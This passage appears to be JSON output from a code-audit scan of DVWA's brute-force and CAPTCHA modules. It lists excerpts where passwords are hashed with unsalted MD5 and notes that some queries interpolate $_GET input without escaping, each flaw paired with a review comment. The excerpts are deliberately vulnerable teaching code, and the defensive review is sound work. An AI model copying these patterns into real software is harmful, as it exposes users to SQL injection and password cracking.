class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span 
class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token 
operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> ",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
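  "note": "Password is hashed with unsalted MD5 on line 16 and the digest is compared in the query on line 19. MD5 is a fast hash and unsuitable for password storage; prefer password_hash() and password_verify()."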
 },
 {
  "id": 75,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span 
class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Default</span> values\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$total_failed_login</span> <span class=\"token operator\">=</span> <span class=\"token number\">3</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 
class=\"line-number\">20:</span> \t<span class=\"token variable\">$lockout_time</span>       <span class=\"token operator\">=</span> <span class=\"token number\">15</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$account_locked</span>     <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 16,
  "start": 11,
  "end": 22,
  "severity": "unknown",
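  "note": "Password is hashed with unsalted MD5 on line 16. MD5 is a fast hash and unsuitable for password storage; prefer password_hash() and password_verify(). The value is SQL-escaped on line 15 before hashing, so the digest depends on that escaping step."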
 },
 {
  "id": 81,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token 
operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> ",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
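  "note": "Password is hashed with unsalted MD5 on line 9; prefer password_hash() and password_verify(). Separately, $user is read from $_GET on line 5 and interpolated into the query on line 12 with no escaping visible in this excerpt, so the query should be a prepared statement with bound parameters."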
 },
 {
  "id": 86,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span 
class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$query</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span 
class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> ",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
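  "note": "Password is hashed with unsalted MD5 on line 11; prefer password_hash() and password_verify(). The query on line 14 is still built by string interpolation and relies on mysqli_real_escape_string (lines 6 and 10); a prepared statement with bound parameters is the more robust fix. The password arrives in $_GET on line 9, which tends to end up in server logs and browser history."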
 },
 {
  "id": 100,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">23:</span> \t}\n<span class=\"line-number\">24:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> CAPTCHA was correct<span class=\"token punctuation\">.</span> <span class=\"token keyword\">Do</span> both new passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"line-number\">31:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span 
class=\"token punctuation\">.</span> \"' LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">32:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span 
class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> ",
  "line": 28,
  "start": 23,
  "end": 34,
  "severity": "unknown",
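  "note": "New password is reduced to an unsalted MD5 digest on line 28 and written by the UPDATE on line 31. Prefer password_hash() for storage. The UPDATE is built by string concatenation, including the return value of dvwaCurrentUser(); a prepared statement with bound parameters would remove the dependence on escaping."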
 },
 {
  "id": 111,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
  "filetype": "php",
  "search": "\\smd5\\s*\\(",
  "match": "<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token 
function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span>  <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" 
spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token 
